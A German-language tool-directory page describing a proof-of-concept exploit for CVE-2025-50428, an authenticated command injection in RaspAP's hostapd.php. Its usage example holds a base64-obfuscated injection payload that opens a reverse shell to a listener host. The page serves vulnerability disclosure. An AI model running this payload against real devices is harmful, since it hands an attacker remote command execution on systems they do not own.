Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-50428 — Proof of concept for the vulnerability CVE-2025-50428: Authenticated OS Command Injection in RaspAP | Kitploit
Tools/GitHubGitHub/security-smarttecs/cve-2025-50428
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

Proof of concept for the vulnerability CVE-2025-50428: Authenticated OS Command Injection in RaspAP

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE Severity Product Version

CVE-2025-50428 - RaspAP-Befehlseinschleusung

Ein Proof-of-Concept-Exploit für CVE-2025-50428, eine Befehlseinschleusungsschwachstelle in RaspAP raspap-webgui 3.2.9 und früher.


Schwachstellen-IDCVE-2025-50428
SchweregradHoch (CVSS 3.1: 8.6)
CVSS-VektorCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
SchwachstellentypCode-Einschleusung
AngriffsvektorRemote (Authentifiziert)
Erforderliche BerechtigungenNiedrig
AuswirkungCode-Ausführung, Privilegieneskalation
Betroffenes Produktraspap-webgui ≤ 3.2.9
Entdeckt vonSmartTECS Cyber Security GmbH

Beschreibung

Dieser Exploit zielt auf eine Befehlseinschleusungsschwachstelle im hostapd.php-Skript von RaspAP ab. Die Schwachstelle besteht aufgrund unzureichender Bereinigung von Benutzereingaben, die über den Parameter interface übergeben werden. Ein authentifizierter Angreifer kann beliebige Betriebssystembefehle einschleusen, was zur Code-Ausführung mit den Berechtigungen des Benutzers www-data führt.

Anfällige Versionen

  • raspap-webgui ≤ 3.2.9

Voraussetzungen

  • Python 3.x
  • Installierte requests-Bibliothek
  • Ziel läuft eine anfällige Version von RaspAP
  • Gültige RaspAP-Anmeldeinformationen

Verwendung

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

Parameter

  • --base-url: Basis-URL der RaspAP-Installation (z.B. http://192.168.122.22)
  • --interface: Wert für den Interface-Parameter, Einschleusungs-Payload erlaubt
  • --username: RaspAP-Benutzername (Standard: admin)
  • --password: RaspAP-Passwort (Standard: secret)

Beispiel

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

Funktionsweise

  1. Das Skript authentifiziert sich an der RaspAP-Weboberfläche mit den bereitgestellten Anmeldeinformationen.
  2. Es ruft ein gültiges CSRF-Token vom Server ab.
  3. Eine POST-Anfrage wird an hostapd.php gesendet, wobei der Interface-Parameter eine bösartige Befehlseinschleusungs-Payload enthält.
  4. Die eingeschleusten Befehle werden auf dem Zielsystem mit www-data-Berechtigungen ausgeführt.

Hinweise

  • Der Exploit erfordert gültige Anmeldeinformationen.
  • Eine erfolgreiche Ausnutzung ermöglicht die Ausführung beliebiger Befehle, die für eine Privilegieneskalation verkettet werden können.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH ist ein Cybersicherheitsunternehmen, das sich auf Penetrationstests, sichere Softwareentwicklung und Schwachstellenforschung spezialisiert hat. Das Unternehmen bietet maßgeschneiderte Sicherheitsbewertungen, Incident Response und strategische Beratungsdienste an, um Organisationen dabei zu helfen, kritische Systeme vor sich entwickelnden Cyberbedrohungen zu schützen.

Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis haben. Der Autor und die SmartTECS Cyber Security GmbH übernehmen keine Haftung für Missbrauch oder Schäden.

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
Tool herunterladen